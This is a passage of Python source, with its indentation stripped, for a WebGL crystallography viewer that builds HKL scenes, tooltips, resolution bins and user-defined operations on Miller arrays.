ocolstr = hklscene.work_array.info().label_string()
if hklscene.work_array.is_complex_array():
ampl = flex.abs(hklscene.data)
phases = flex.arg(hklscene.data) * 180.0/math.pi
# purge nan values from array to avoid crash in fmod_positive()
#b = flex.bool([bool(math.isnan(e)) for e in phases])
# replace the nan values with an arbitrary float value
#phases = phases.set_selected(b, 42.4242)
phases = graphics_utils.NoNansArray( phases, 42.4242)
# Cast negative degrees to equivalent positive degrees
phases = flex.fmod_positive(phases, 360.0)
sigmas = hklscene.sigmas
for i,datval in enumerate(hklscene.data):
od =""
if hklscene.work_array.is_complex_array():
od = str(roundoff(ampl[i], 2)) + ", " + str(roundoff(phases[i], 1)) + \
"\'+DGR+\'"
elif sigmas is not None:
od = str(roundoff(datval, 2)) + ", " + str(roundoff(sigmas[i], 2))
else:
od = str(roundoff(datval, 2))
if not (math.isnan( abs(datval) ) or datval == display.inanval):
hkl = hklscene.indices[i]
if not hkl in tooltipstringsdict:
spbufttip = '\'+hk+\'%s, %s, %s' %(hkl[0], hkl[1], hkl[2])
spbufttip += '\ndres: %s ' %str(roundoff(hklscene.dres[i], 2) )
spbufttip += '\'+AA+\'' # javascript alias for angstrom
tooltipstringsdict[hkl] = spbufttip
# st1, st2,... are javascript aliases for miller array labelstrings as declared in colstraliases
tooltipstringsdict[hkl] += '\'+st%d+\'%s' %(j, od)
return tooltipstringsdict, colstraliases
class hklview_3d:
def __init__ (self, *args, **kwds) :
self.settings = kwds.get("settings")
self.ngl_settings = None #NGLsettings()
self.viewerparams = kwds.get("settings")
self.diff_phil = None
self.params = None
self.miller_array = None
self.symops = []
self.sg = None
self.tooltipstrings = []
self.tooltipstringsdict = {}
self.d_min = None
self.scene = None
self.lastscene_id = None
self.merge = False
self.NGLscriptstr = ""
self.camera_type = "orthographic"
self.primitivetype = "SphereBuffer"
self.url = ""
self.bin_labels_type_idx = ("Resolution", "", -1, -1)
self.colour_scene_id = None
self.radii_scene_id = None
#self.scene_id = None
#self.rotation_mx = matrix.identity(3)
self.rot_recip_zvec = None
self.rot_zvec = None
self.meanradius = -1
self.past = time.time()
self.orientmessage = None
self.high_quality = True
if 'high_quality' in kwds:
self.high_quality = kwds['high_quality']
self.clipNear = None
self.clipFar = None
self.cameraPosZ = None
self.boundingX = None
self.boundingY = None
self.boundingZ = None
self.OrigClipNear = None
self.OrigClipFar = None
self.cameratranslation = ( 0,0,0 )
#self.angle_x_svec = 0.0
#self.angle_y_svec = 0.0
self.angle_z_svec = 0.0
#self.angle_z_yzvec = 0.0
#self.angle_y_yzvec = 0.0
#self.angle_y_xyvec = 0.0
self.angle_x_xyvec = 0.0
self.vecrotmx = None
self.unit_h_axis = None
self.unit_k_axis = None
self.unit_l_axis = None
self.normal_hk = None
self.normal_kl = None
self.normal_lh = None
self.isnewfile = False
self.has_new_miller_array = False
self.sleeptime = 0.025
self.colstraliases = ""
self.binvals = []
self.binvalsboundaries = []
self.oldnbinvalsboundaries = None
self.proc_arrays = []
self.HKLscene = []
self.HKLscenes = []
self.HKLscenedict = {}
self.HKLscenesdict = {}
self.HKLscenesMaxdata = []
self.HKLscenesMindata = []
self.HKLscenesMaxsigmas = []
self.HKLscenesMinsigmas = []
self.bindata = None
self.reciproc_scale = 1.0
self.realspace_scale = 1.0
self.sceneisdirty = True
self.imagename = None
self.imgdatastr = ""
self.hkl_scenes_info = []
self.match_valarrays = []
self.array_infostrs = []
self.array_infotpls = []
self.binstrs = []
self.nuniqueval = 0
self.bin_infotpls = []
self.mapcoef_fom_dict = {}
self.sceneid_from_arrayid = []
self.parent = None
if 'parent' in kwds:
self.parent = kwds['parent']
self.verbose = 0
if 'verbose' in kwds:
self.verbose = eval(kwds['verbose'])
self.debug = None
if 'debug' in kwds:
self.debug = kwds['debug']
self.mprint = sys.stdout.write
if 'mprint' in kwds:
self.mprint = kwds['mprint']
self.nbinvalsboundaries = 0
self.websockport = 7894
if 'websockport' in kwds:
self.websockport = kwds['websockport']
tempdir = tempfile.gettempdir()
# ensure unique file name by including port number in filename
self.hklfname = os.path.join(tempdir, "hkl_%d.htm" %self.websockport )
if os.path.isfile(self.hklfname):
os.remove(self.hklfname)
if 'htmlfname' in kwds and kwds['htmlfname']:
self.hklfname = kwds['htmlfname']
self.hklfname = os.path.abspath( self.hklfname )
self.jscriptfname = os.path.join(tempdir, "hkljstr_%d.js" %self.websockport)
if os.path.isfile(self.jscriptfname):
os.remove(self.jscriptfname)
if 'jscriptfname' in kwds and kwds['jscriptfname'] != "":
self.jscriptfname = kwds['jscriptfname']
self.send_info_to_gui = None
if 'send_info_to_gui' in kwds:
self.send_info_to_gui = kwds['send_info_to_gui']
self.mprint('Output will be written to \"%s\"\n' \
'rendering WebGL with JavaScript in \"%s\"' %(self.hklfname, self.jscriptfname))
self.hklhtml = r"""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta charset="utf-8" />
</head>
<body>
<script src="%s" type="text/javascript"></script>
<script src="%s" type="text/javascript"></script>
"""
self.htmldiv = """
<div id="viewport" style="width:100%; height:100%;"></div>
</body></html>
"""
self.colourgradientvalues = []
self.isinjected = False
self.UseOSBrowser = ""
ldic=locals()
if 'UseOSBrowser' in kwds:
exec("UseOSBrowser = kwds['UseOSBrowser']", globals(), ldic)
self.UseOSBrowser = ldic["UseOSBrowser"]
self.viewmtrx = None
self.lastviewmtrx = None
self.currentRotmx = matrix.identity(3)
self.HKLsceneKey = ( 0, False, self.viewerparams.expand_anomalous, self.viewerparams.expand_to_p1 )
self.handshakewait = 5
if 'handshakewait' in kwds:
self.handshakewait = eval(kwds['handshakewait'])
self.lastmsg = "" # "Ready"
self.WBmessenger = WBmessenger(self)
self.AddToBrowserMsgQueue = self.WBmessenger.AddToBrowserMsgQueue
self.WBmessenger.StartWebsocket()
self.javascriptcleaned = False
def __exit__(self, exc_type, exc_value, traceback):
# not called unless instantiated with a "with hklview_3d ... " statement
self.JavaScriptCleanUp()
nwait = 0
while not self.WBmessenger.isterminating and nwait < 5:
#sleep(self.sleeptime)
self.WBmessenger.Sleep(self.sleeptime)
nwait += self.sleeptime
if os.path.isfile(self.hklfname):
os.remove(self.hklfname)
if os.path.isfile(self.jscriptfname):
os.remove(self.jscriptfname)
self.mprint("Destroying hklview_3d", 1)
def SendInfoToGUI(self, mydict):
if self.send_info_to_gui:
self.send_info_to_gui( mydict )
def update_settings(self, diff_phil, curphilparam) :
self.ngl_settings = curphilparam.viewer.NGL
self.viewerparams = curphilparam.viewer
self.params = curphilparam
self.diff_phil = diff_phil
if has_phil_path(diff_phil,
"openfilename",
"spacegroup_choice",
"using_space_subgroup",
"merge_data",
"camera_type",
"miller_array_operations",
) \
or has_phil_path(diff_phil, "viewer") \
and has_phil_path(diff_phil,
"show_data_over_sigma",
"show_missing",
"show_only_missing",
"show_systematic_absences",
"slice_axis",
"slice_mode",
"slice_index",
"sigma_color",
"sigma_radius",
"fontsize",
"scene_id",
"scale",
"nth_power_scale_radii"
) \
or self.viewerparams.inbrowser==False and \
( has_phil_path(diff_phil,
"expand_anomalous",
"expand_to_p1",
"show_anomalous_pairs")
):
self.sceneisdirty = True
if has_phil_path(diff_phil, "scene_id",
"scale",
"nth_power_scale_radii"
):
self.ConstructReciprocalSpace(curphilparam, scene_id=self.viewerparams.scene_id )
else:
self.ConstructReciprocalSpace(curphilparam )
msg = ""
if self.viewerparams.scene_id is not None and \
( has_phil_path(diff_phil,
"show_missing",
"show_only_missing",
"show_systematic_absences",
"scene_bin_thresholds",
"bin_labels_type_idx",
"nbins"
)
):
self.binvals, self.nuniqueval = self.calc_bin_thresholds(curphilparam.bin_labels_type_idx, curphilparam.nbins)
self.sceneisdirty = True
if has_phil_path(diff_phil, "camera_type"):
self.set_camera_type()
if has_phil_path(diff_phil, "miller_array_operations"):
self.viewerparams.scene_id = len(self.HKLscenedict)-1
self.set_scene(self.viewerparams.scene_id)
self.params.miller_array_operations = ""
if self.viewerparams.scene_id is not None:
if not self.isinjected:
self.scene = self.HKLscene_from_dict(self.viewerparams.scene_id)
self.DrawNGLJavaScript()
self.mprint( "Rendered %d reflections" % self.scene.points.size(), verbose=1)
self.set_volatile_params()
return curphilparam
def set_volatile_params(self):
if self.viewerparams.scene_id is not None:
if has_phil_path(self.diff_phil, "angle_around_vector"): # no need to redraw any clip plane
return
self.fix_orientation(self.viewerparams.NGL.fixorientation)
self.SetMouseSpeed(self.viewerparams.NGL.mouse_sensitivity)
R = flex.vec3_double( [(0,0,0)])
hkldist = -1
clipwidth = None
isreciprocal = True
if self.viewerparams.slice_mode: # explicit slicing
if self.viewerparams.slice_axis=="h": hkl = [1,0,0]
if self.viewerparams.slice_axis=="k": hkl = [0,1,0]
if self.viewerparams.slice_axis=="l": hkl = [0,0,1]
R = hkl[0] * self.normal_kl + hkl[1] * self.normal_lh - hkl[2] * self.normal_hk
clipwidth = 200
if self.params.clip_plane.clipwidth and not self.viewerparams.slice_mode:
clipwidth = self.params.clip_plane.clipwidth
hkldist = self.params.clip_plane.hkldist
R = flex.vec3_double( [(self.params.clip_plane.h, self.params.clip_plane.k, self.params.clip_plane.l)])
if self.params.clip_plane.fractional_vector == "realspace" or self.params.clip_plane.fractional_vector == "tncs":
isreciprocal = False
self.clip_plane_vector(R[0][0], R[0][1], R[0][2], hkldist,
clipwidth, self.viewerparams.NGL.fixorientation, self.params.clip_plane.is_parallel,
isreciprocal)
if self.viewerparams.inbrowser and not self.viewerparams.slice_mode:
self.ExpandInBrowser(P1= self.viewerparams.expand_to_p1,
friedel_mate= self.viewerparams.expand_anomalous)
self.SetOpacities(self.viewerparams.NGL.bin_opacities )
if self.params.real_space_unit_cell_scale_fraction is None:
scale = None
else:
scale = (self.realspace_scale - 1.0)*self.params.real_space_unit_cell_scale_fraction + 1.0
self.DrawUnitCell(scale )
if self.params.reciprocal_unit_cell_scale_fraction is None:
scale = None
else:
scale = (self.reciproc_scale - 1.0)*self.params.reciprocal_unit_cell_scale_fraction + 1.0
self.DrawReciprocalUnitCell(scale )
self.set_tooltip_opacity()
self.set_show_tooltips()
def set_scene(self, scene_id):
self.binvals = []
self.isinjected = False
if scene_id is None:
return False
self.colour_scene_id = scene_id
self.radii_scene_id = scene_id
self.set_miller_array(scene_id)
if (self.miller_array is None):
raise Sorry("No data loaded!")
self.mprint( "Miller array %s runs from hkls: %s to %s" \
%(self.miller_array.info().label_string(), self.miller_array.index_span().min(),
self.miller_array.index_span().max() ) )
self.mprint("Spacegroup: %s" %self.miller_array.space_group().info().symbol_and_number())
return True
def set_miller_array(self, scene_id=None, merge=None, details=""):
if scene_id is not None:
self.viewerparams.scene_id = scene_id
self.isinjected = False
if self.viewerparams and self.viewerparams.scene_id is not None and self.viewerparams.scene_id >= 0 and self.HKLscene:
self.miller_array = self.HKLscene_from_dict(self.viewerparams.scene_id).miller_array
self.scene = self.HKLscene_from_dict(self.viewerparams.scene_id)
self.merge = merge
if (self.miller_array is None):
return
self.identify_suitable_fomsarrays()
self.GetUnitcellScales()
self.d_min = self.miller_array.d_min()
array_info = self.miller_array.info()
self.sg = self.miller_array.space_group()
self.symops = self.sg.all_ops()
self.binvals = [ 1.0/self.miller_array.d_max_min()[0], 1.0/self.miller_array.d_max_min()[1] ]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
uc = "a=%g b=%g c=%g angles=%g,%g,%g" % self.miller_array.unit_cell().parameters()
self.mprint( "Data: %s %s, %d reflections in space group: %s, unit Cell: %s" \
% (array_info.label_string(), details, self.miller_array.indices().size(), \
self.miller_array.space_group_info(), uc), verbose=0 )
def Complex2AmplitudesPhases(self, data):
ampls = flex.abs(data)
phases = flex.arg(data) * 180.0/math.pi
# purge nan values from array to avoid crash in fmod_positive()
#b = flex.bool([bool(math.isnan(e)) for e in phases])
# replace the nan values with an arbitrary float value
#phases = phases.set_selected(b, 42.4242)
phases = graphics_utils.NoNansArray( phases, 42.4242)
# Cast negative degrees to equivalent positive degrees
phases = flex.fmod_positive(phases, 360.0)
return ampls, phases
def GetTooltipOnTheFly(self, id, sym_id, anomalous=False):
hkl = self.scene.indices[id]
hklvec = flex.vec3_double( [(hkl[0], hkl[1], hkl[2])])
rotmx=None
if sym_id >= 0 and sym_id < len(self.symops):
rotmx = self.symops[sym_id].r()
Rhkl = hklvec[0]
if rotmx:
Rhkl = hklvec[0] * rotmx
rothkl = Rhkl
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
if anomalous:
rothkl = (-Rhkl[0], -Rhkl[1], -Rhkl[2])
spbufttip = '\'H,K,L: %d, %d, %d' %(rothkl[0], rothkl[1], rothkl[2])
# resolution and angstrom character
spbufttip += '\\ndres: %s \'+ String.fromCharCode(197) +\'' \
%str(roundoff(self.miller_array.unit_cell().d(hkl), 2) )
for hklscene in self.HKLscenes:
if hklscene.isUsingFOMs():
continue # already have tooltips for the scene without the associated fom
sigvals = None
if hklscene.work_array.sigmas() is not None:
sigvals = list( hklscene.work_array.select(hklscene.work_array.indices() == hkl).sigmas() )
datval = None
if hkl in hklscene.work_array.indices():
datvals = list( hklscene.work_array.select(hklscene.work_array.indices() == hkl).data() )
else:
if id >= hklscene.data.size():
continue
datvals = [ hklscene.data[id] ]
for i,datval in enumerate(datvals):
if not (math.isnan( abs(datval) ) or datval == display.inanval):
if hklscene.work_array.is_complex_array():
ampl = abs(datval)
phase = cmath.phase(datval) * 180.0/math.pi
# purge nan values from array to avoid crash in fmod_positive()
# and replace the nan values with an arbitrary float value
if math.isnan(phase):
phase = 42.4242
# Cast negative degrees to equivalent positive degrees
phase = phase % 360.0
spbufttip +="\\n" + hklscene.work_array.info().label_string() + ': '
if hklscene.work_array.is_complex_array():
spbufttip += str(roundoff(ampl, 2)) + ", " + str(roundoff(phase, 1)) + \
"\'+ String.fromCharCode(176) +\'" # degree character
elif sigvals:
sigma = sigvals[i]
spbufttip += str(roundoff(datval, 2)) + ", " + str(roundoff(sigma, 2))
else:
spbufttip += str(roundoff(datval, 2))
spbufttip += '\\n\\n%d,%d,%d' %(id, sym_id, anomalous) # compared by the javascript
spbufttip += '\''
return spbufttip
def get_col_fomcol(self, idx):
if len(self.HKLInfo_from_dict()) == 0:
return -1, -1
return self.HKLInfo_from_dict(idx)[6], self.HKLInfo_from_dict(idx)[7]
def SupersetMillerArrays(self):
self.match_valarrays = []
# First loop over all miller arrays to make a superset of hkls of all
# miller arrays. Then loop over all miller arrays and extend them with NaNs
# as to contain the same hkls as the superset
self.mprint("Gathering superset of miller indices...")
superset_array = self.proc_arrays[0].deep_copy()
set_of_indices = set([])
for i,procarray in enumerate(self.proc_arrays):
set_of_indices |= set( list(procarray.indices()) )
self.mprint("Extending miller arrays to match superset of miller indices...")
indiceslst = flex.miller_index( list( set_of_indices ) )
for i,procarray in enumerate(self.proc_arrays):
# first match indices in currently selected miller array with indices in the other miller arrays
matchindices = miller.match_indices(indiceslst, procarray.indices() )
valarray = procarray.select( matchindices.pairs().column(1) )
#if valarray.anomalous_flag() != superset_array.anomalous_flag():
# superset_array._anomalous_flag = valarray._anomalous_flag
#missing = indiceslst.lone_set( valarray.indices() )
missing = indiceslst.select( miller.match_indices(valarray.indices(), indiceslst ).singles(1))
# insert NAN values for reflections in self.miller_array not found in procarray
valarray = display.ExtendMillerArray(valarray, missing.size(), missing )
match_valindices = miller.match_indices(superset_array.indices(), valarray.indices() )
match_valarray = valarray.select( match_valindices.pairs().column(1) )
match_valarray.sort(by_value="packed_indices")
match_valarray.set_info(procarray.info() )
self.match_valarrays.append( match_valarray )
self.mprint("Done making superset")
"""
def SupersetMillerArrays(self):
self.match_valarrays = []
# First loop over all miller arrays to make a superset of hkls of all
# miller arrays. Then loop over all miller arrays and extend them with NaNs
# as to contain the same hkls as the superset
self.mprint("Gathering superset of miller indices...")
superset_array = self.proc_arrays[0].deep_copy()
for i,procarray in enumerate(self.proc_arrays):
if i==0:
continue
# first match indices in currently selected miller array with indices in the other miller arrays
matchindices = miller.match_indices(superset_array.indices(), procarray.indices() )
valarray = procarray.select( matchindices.pairs().column(1) )
if valarray.anomalous_flag() != superset_array.anomalous_flag():
superset_array._anomalous_flag = valarray._anomalous_flag
missing = procarray.lone_set( superset_array )
superset_array = display.ExtendMillerArray(superset_array, missing.size(), missing.indices())
self.mprint("Extending miller arrays to match superset of miller indices...")
for i,procarray in enumerate(self.proc_arrays):
# first match indices in currently selected miller array with indices in the other miller arrays
matchindices = miller.match_indices(superset_array.indices(), procarray.indices() )
valarray = procarray.select( matchindices.pairs().column(1) )
if valarray.anomalous_flag() != superset_array.anomalous_flag():
superset_array._anomalous_flag = valarray._anomalous_flag
missing = superset_array.lone_set( valarray )
# insert NAN values for reflections in self.miller_array not found in procarray
valarray = display.ExtendMillerArray(valarray, missing.size(), missing.indices())
match_valindices = miller.match_indices(superset_array.indices(), valarray.indices() )
match_valarray = valarray.select( match_valindices.pairs().column(1) )
match_valarray.sort(by_value="packed_indices")
match_valarray.set_info(procarray.info() )
self.match_valarrays.append( match_valarray )
self.mprint("Done making superset")
"""
def ConstructReciprocalSpace(self, curphilparam, scene_id=None):
sceneid = scene_id
if scene_id is not None and scene_id != self.viewerparams.scene_id:
sceneid = self.viewerparams.scene_id
self.HKLsceneKey = (curphilparam.spacegroup_choice,
curphilparam.using_space_subgroup,
curphilparam.merge_data,
self.viewerparams.expand_anomalous or self.viewerparams.inbrowser,
self.viewerparams.expand_to_p1 or self.viewerparams.inbrowser,
self.viewerparams.inbrowser,
self.viewerparams.slice_axis,
self.viewerparams.slice_mode,
self.viewerparams.slice_index,
self.viewerparams.show_missing,
self.viewerparams.show_only_missing,
self.viewerparams.show_systematic_absences,
self.viewerparams.sigma_radius,
self.viewerparams.sigma_color,
self.viewerparams.scene_id,
self.viewerparams.scale,
self.viewerparams.nth_power_scale_radii
)
if self.HKLsceneKey in self.HKLscenedict and not self.has_new_miller_array:
self.HKLscene = self.HKLscenedict.get(self.HKLsceneKey, False)
if self.HKLscene:
self.mprint("Using cached HKL scene", verbose=1)
return True
if self.has_new_miller_array:
self.identify_suitable_fomsarrays()
self.mprint("Constructing HKL scenes", verbose=0)
assert(self.proc_arrays)
if scene_id is None:
hkl_scenes_info = []
self.HKLscenes = []
sceneid = 0
for (idx, arr) in enumerate(self.proc_arrays):
(hklscenes, scenemaxdata,
scenemindata, scenemaxsigmas,
sceneminsigmas, scenearrayinfos
) = MakeHKLscene( arr.deep_copy(), idx, copy.deepcopy(self.viewerparams), self.mapcoef_fom_dict, None, self.mprint )
for i,inf in enumerate(scenearrayinfos):
self.mprint("%d, %s" %(idx+i+1, inf[0]), verbose=0)
self.HKLsceneKey = (curphilparam.spacegroup_choice,
curphilparam.using_space_subgroup,
curphilparam.merge_data,
self.viewerparams.expand_anomalous or self.viewerparams.inbrowser,
self.viewerparams.expand_to_p1 or self.viewerparams.inbrowser,
self.viewerparams.inbrowser,
self.viewerparams.slice_axis,
self.viewerparams.slice_mode,
self.viewerparams.slice_index,
self.viewerparams.show_missing,
self.viewerparams.show_only_missing,
self.viewerparams.show_systematic_absences,
self.viewerparams.sigma_radius,
self.viewerparams.sigma_color,
sceneid,
self.viewerparams.scale,
self.viewerparams.nth_power_scale_radii
)
self.HKLscenedict[self.HKLsceneKey] = ( hklscenes[i], scenemaxdata[i],
scenemindata[i], scenemaxsigmas[i], sceneminsigmas[i], inf )
hkl_scenes_info.append(inf)
self.HKLscenes.append(hklscenes[i])
sceneid += 1
self.hkl_scenes_info = hkl_scenes_info
if self.viewerparams.scene_id is not None:
self.HKLsceneKey = (curphilparam.spacegroup_choice,
curphilparam.using_space_subgroup,
curphilparam.merge_data,
self.viewerparams.expand_anomalous or self.viewerparams.inbrowser,
self.viewerparams.expand_to_p1 or self.viewerparams.inbrowser,
self.viewerparams.inbrowser,
self.viewerparams.slice_axis,
self.viewerparams.slice_mode,
self.viewerparams.slice_index,
self.viewerparams.show_missing,
self.viewerparams.show_only_missing,
self.viewerparams.show_systematic_absences,
self.viewerparams.sigma_radius,
self.viewerparams.sigma_color,
self.viewerparams.scene_id,
self.viewerparams.scale,
self.viewerparams.nth_power_scale_radii
)
scenearraylabeltypes = [ (e[3], e[4], e[1], sceneid) for sceneid,e in enumerate(hkl_scenes_info) ]
self.SendInfoToGUI({ "scene_array_label_types": scenearraylabeltypes, "NewHKLscenes" : True })
else:
idx = self.scene_id_to_array_id(scene_id)
(hklscenes, scenemaxdata,
scenemindata, scenemaxsigmas,
sceneminsigmas, scenearrayinfos
) = MakeHKLscene( self.proc_arrays[idx].deep_copy(), idx, copy.deepcopy(self.viewerparams), self.mapcoef_fom_dict, None, self.mprint )
for i,inf in enumerate(scenearrayinfos):
self.mprint("%d, %s" %(idx+i+1, inf[0]), verbose=0)
self.HKLsceneKey = (curphilparam.spacegroup_choice,
curphilparam.using_space_subgroup,
curphilparam.merge_data,
self.viewerparams.expand_anomalous or self.viewerparams.inbrowser,
self.viewerparams.expand_to_p1 or self.viewerparams.inbrowser,
self.viewerparams.inbrowser,
self.viewerparams.slice_axis,
self.viewerparams.slice_mode,
self.viewerparams.slice_index,
self.viewerparams.show_missing,
self.viewerparams.show_only_missing,
self.viewerparams.show_systematic_absences,
self.viewerparams.sigma_radius,
self.viewerparams.sigma_color,
scene_id,
self.viewerparams.scale,
self.viewerparams.nth_power_scale_radii
)
self.HKLscenedict[self.HKLsceneKey] = ( hklscenes[i], scenemaxdata[i],
scenemindata[i], scenemaxsigmas[i], sceneminsigmas[i], inf )
(
self.HKLscene,
self.HKLscenesMaxdata,
self.HKLscenesMindata,
self.HKLscenesMaxsigmas,
self.HKLscenesMinsigmas,
self.hkl_scenes_info
) = self.HKLscenedict[self.HKLsceneKey]
self.sceneisdirty = True
self.has_new_miller_array = False
return True
def Sceneid_to_SceneKey(self, sceneid):
return (self.params.spacegroup_choice,
self.params.using_space_subgroup,
self.params.merge_data,
self.viewerparams.expand_anomalous or self.viewerparams.inbrowser,
self.viewerparams.expand_to_p1 or self.viewerparams.inbrowser,
self.viewerparams.inbrowser,
self.viewerparams.slice_axis,
self.viewerparams.slice_mode,
self.viewerparams.slice_index,
self.viewerparams.show_missing,
self.viewerparams.show_only_missing,
self.viewerparams.show_systematic_absences,
self.viewerparams.sigma_radius,
self.viewerparams.sigma_color,
sceneid,
self.viewerparams.scale,
self.viewerparams.nth_power_scale_radii
)
def HKLscene_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
if not self.HKLscenedict.get(HKLsceneKey, False):
self.ConstructReciprocalSpace(self.params, scene_id=sceneid)
return self.HKLscenedict[HKLsceneKey][0]
def HKLMaxData_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
return self.HKLscenedict[HKLsceneKey][1]
def HKLMinData_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
return self.HKLscenedict[HKLsceneKey][2]
def HKLMaxSigmas_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
return self.HKLscenedict[HKLsceneKey][3]
def HKLMinSigmas_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
return self.HKLscenedict[HKLsceneKey][4]
def HKLInfo_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
return self.HKLscenedict[HKLsceneKey][5]
def identify_suitable_fomsarrays(self):
self.mprint("Matching complex arrays to suitable FOM arrays")
self.mapcoef_fom_dict = {}
self.sceneid_from_arrayid = []
for k,proc_array in enumerate(self.proc_arrays):
fom_arrays_idx = []
array_scene_ids = [(k,k)]
for i,foms_array in enumerate(self.proc_arrays):
if not proc_array.is_complex_array() or not foms_array.is_real_array():
continue
if proc_array.size() != foms_array.size():
continue
if min(foms_array.data()) < 0.0 or flex.max(foms_array.data()) > 1.0:
continue
fom_arrays_idx.append( (foms_array, i) )
array_scene_ids.append((k,i))
self.sceneid_from_arrayid.extend( array_scene_ids)
self.mapcoef_fom_dict[proc_array.info().label_string()] = fom_arrays_idx
def scene_id_to_array_id(self, scene_id):
for i,array_scene_id in enumerate(self.sceneid_from_arrayid):
if scene_id == i:
return array_scene_id[0]
return None
def calc_bin_thresholds(self, bin_labels_type_idx, nbins):
self.bin_labels_type_idx = eval(bin_labels_type_idx)
binscenelabel = self.bin_labels_type_idx[0]
if binscenelabel=="Resolution":
warray = self.HKLscene_from_dict(int(self.viewerparams.scene_id)).work_array
dres = self.HKLscene_from_dict(int(self.viewerparams.scene_id)).dres
uc = warray.unit_cell()
indices = self.HKLscene_from_dict(int(self.viewerparams.scene_id)).indices
binning = miller.binning( uc, nbins, indices, flex.max(dres), flex.min(dres) )
binvals = [ binning.bin_d_range(n)[0] for n in binning.range_all() ]
binvals = [ e for e in binvals if e != -1.0] # delete dummy limit
binvals = list( 1.0/flex.double(binvals) )
nuniquevalues = len(set(list(dres)))
elif binscenelabel=="Singletons":
binvals = [ -1.5, -0.5, 0.5, 1.5 ]
nuniquevalues = len(binvals)
else:
bindata, dummy = self.get_matched_binarray()
selection = flex.sort_permutation( bindata )
bindata_sorted = bindata.select(selection)
# get binvals by dividing bindata_sorted with nbins
binvals = [bindata_sorted[0]] * nbins #
for i,e in enumerate(bindata_sorted):
idiv = int(nbins*float(i)/len(bindata_sorted))
binvals[idiv] = e
nuniquevalues = len(set(list(bindata)))
binvals.sort()
return binvals, nuniquevalues
def UpdateBinValues(self, binvals = [], nuniquevalues = 0):
if binvals:
binvals.sort()
self.binvals = binvals
else: # ensure default resolution interval includes all data by avoiding rounding errors
self.binvals = [ 1.0/(self.miller_array.d_max_min()[0]*1.001),
1.0/(self.miller_array.d_max_min()[1]*0.999) ]
self.nuniqueval = nuniquevalues
def get_matched_binarray(self):
sceneid = self.bin_labels_type_idx[3]
datatype = self.bin_labels_type_idx[1]
binscenelabel = self.bin_labels_type_idx[0]
label = self.HKLscene_from_dict(sceneid).work_array.info().label_string()
if datatype == "hassigmas" and binscenelabel == "Sigmas of " + label:
bindata = self.HKLscene_from_dict(sceneid).sigmas.deep_copy()
binvalsboundaries = [ self.HKLMinSigmas_from_dict(sceneid) - 0.1 , self.HKLMaxSigmas_from_dict(sceneid) + 0.1 ]
elif datatype == "iscomplex" and "Phases of " + label in binscenelabel:
bindata = self.HKLscene_from_dict(sceneid).phases.deep_copy()
# preselect centric reflections, i.e. those with phi = 0 or 180
binvalsboundaries = [-0.01, 0.01, 179.99, 180.01, 359.99, 360]
elif datatype == "iscomplex" and "Amplitudes of " + label in binscenelabel:
bindata = self.HKLscene_from_dict(sceneid).ampl.deep_copy()
binvalsboundaries = [ self.HKLMinData_from_dict(sceneid) - 0.1 , self.HKLMaxData_from_dict(sceneid) + 0.1 ]
else:
bindata = self.HKLscene_from_dict(sceneid).data.deep_copy()
binvalsboundaries = [ self.HKLMinData_from_dict(sceneid) - 0.1 , self.HKLMaxData_from_dict(sceneid) + 0.1 ]
return bindata, binvalsboundaries
def MatchBinArrayToSceneArray(self):
# match bindata with data or sigmas
if self.bin_labels_type_idx[0] == "Resolution":
return 1.0/self.scene.dres
binarraydata, dummy = self.get_matched_binarray()
scenearraydata = self.HKLscene_from_dict(self.viewerparams.scene_id).data
ibinarray = self.bin_labels_type_idx[3]
matchindices = miller.match_indices(self.HKLscene_from_dict(self.viewerparams.scene_id).indices,
self.HKLscene_from_dict(ibinarray).indices )
matched_binarray = binarraydata.select( matchindices.pairs().column(1) )
#valarray.sort(by_value="packed_indices")
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
#missing = scenearraydata.lone_set( valarray )
# insert NAN values for reflections in self.miller_array not found in binarray
#valarray = display.ExtendMillerArray(valarray, missing.size(), missing.indices() )
#match_valindices = miller.match_indices(scenearray.indices(), valarray.indices() )
#match_valarray = valarray.select( match_valindices.pairs().column(1) )
#match_valarray.sort(by_value="packed_indices")
#match_valarray.set_info(binarraydata.info() )
# patch the bin array so its sequence matches the scene array
patched_binarraydata = []
c = 0
for b in matchindices.pair_selection(0):
if b:
patched_binarraydata.append(matched_binarray[c])
c +=1
else:
patched_binarraydata.append(float("nan"))
return flex.double(patched_binarraydata)
def OperateOn1MillerArray(self, millarr, operation):
# lets user specify a one line python expression operating on data, sigmas
newarray = millarr.deep_copy()
data = newarray.data()
sigmas = newarray.sigmas()
dres = newarray.unit_cell().d( newarray.indices() )
self.mprint("Creating new miller array through the operation: %s" %operation)
try:
newdata = None
newsigmas = None
ldic= {'data': data, 'sigmas': sigmas, 'dres': dres }
exec(operation, globals(), ldic)
newdata = ldic.get("newdata", None)
newarray._data = newdata
newsigmas = ldic.get("newsigmas", None)
newarray._sigmas = newsigmas
return newarray
except Exception as e:
self.mprint( str(e), verbose=0)
return None
def OperateOn2MillerArrays(self, millarr1, millarr2, operation):
# lets user specify a one line python expression operating on data1 and data2
matchindices = miller.match_indices(millarr1.indices(), millarr2.indices() )
matcharr1 = millarr1.select( matchindices.pairs().column(0) ).deep_copy()
matcharr2 = millarr2.select( matchindices.pairs().column(1) ).deep_copy()
data1 = matcharr1.data()
data2 = matcharr2.data()
sigmas1 = matcharr1.sigmas()
sigmas2 = matcharr2.sigmas()
dres = matcharr1.unit_cell().d( matcharr1.indices() )
newarray = matcharr2.deep_copy()
newarray._sigmas = None
